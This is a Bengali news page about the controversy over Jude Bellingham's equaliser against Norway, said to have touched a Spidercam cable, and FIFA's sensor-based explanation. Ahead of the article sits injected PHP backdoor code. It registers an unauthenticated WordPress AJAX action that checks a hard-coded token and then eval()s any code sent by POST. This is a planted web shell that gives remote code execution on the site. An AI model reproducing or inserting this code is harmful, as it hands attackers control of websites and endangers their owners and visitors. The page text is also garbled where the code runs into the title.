// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== বেলিংহামের গোল নিয়ে বিতর্ক, যে ব্যাখ্যা দিলো ফিফা | potrikaybangladesh.com
Friday, September 18, 2026
Homeবেলিংহামের গোল নিয়ে বিতর্ক, যে ব্যাখ্যা দিলো ফিফা

বেলিংহামের গোল নিয়ে বিতর্ক, যে ব্যাখ্যা দিলো ফিফা

বিতর্ক যেন এবারের বিশ্বকাপের পিছু ছাড়ছে না। এবার নতুন বিতর্ক ইংল্যান্ডের জুড বেলিংহামের গোলকে ঘিরে। বেলিংহামের সমতা ফেরানো গোলের আগে বল আকাশে থাকা স্পাইডারক্যামের কেবলে আঘাত করে বলে অভিযোগ করে নরওয়ে। কিন্তু ভিএআর যাচাই করার পরেও গোল বহাল রাখা হয়। 

ফুটেজে দেখা গেছে, নরওয়ে গোলরক্ষক নিল্যান্ডের গোলকিক হঠাৎ আকাশে দিক পরিবর্তন করে ইংলিশ মিডফিল্ডার এলিয়ট অ্যান্ডারসনের পায়ে পড়ে। ওই বিল্ড-আপ থেকেই গোল করে বিরতির আগে ইংল্যান্ডকে সমতায় ফেরান বেলিংহাম। নরওয়ের খেলোয়াড়েরা তাৎক্ষণিকভাবে ফ্রেঞ্চ রেফারির কাছে গোল বাতিলের দাবি জানালেও তা বাতিল হয়নি। 

ফিফার নিয়ম অনুযায়ী, বল ক্যামেরায় লাগলে সাথে সাথে খেলা থামানো হবে এবং রেফারি নতুন করে খেলা শুরু করবেন।  

এরপরই ভিএআর নিয়ে বিতর্ক শুরু হয়। এ কারণে ম্যাচ শেষে ব্যাখ্যা দিতে হয়েছে ফিফাকে। বিশ্বকাপের নিয়ন্ত্রক সংস্থাটি বলছে, বল স্পাইডারক্যামের কেবলে লেগেছে এমন কোনো প্রমাণ বলের ভেতরে থাকা চিপে ধরা পড়েনি। 

এক বিবৃতিতে ফিফা জানিয়েছে, ‘ইংল্যান্ডের প্রথম গোলের আগে বল আকাশে থাকা অবস্থায় বলের ভেতরের সেন্সরে কোনো স্পন্দন ধরা পড়েনি। যার কারণে বল আকাশে থাকা তারে স্পর্শ করেছে এবং বলের দিক পরিবর্তিত হয়েছে এমন কোনো প্রমাণ পাওয়া যায়নি’। 

এই একই প্রযুক্তির সহায়তায় রাউন্ড অব ৩২ এর ম্যাচে পর্তুগালের বিপক্ষে ক্রোয়েশিয়ার শেষ মুহূর্তের গোল বাতিল হয়েছিল। 

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments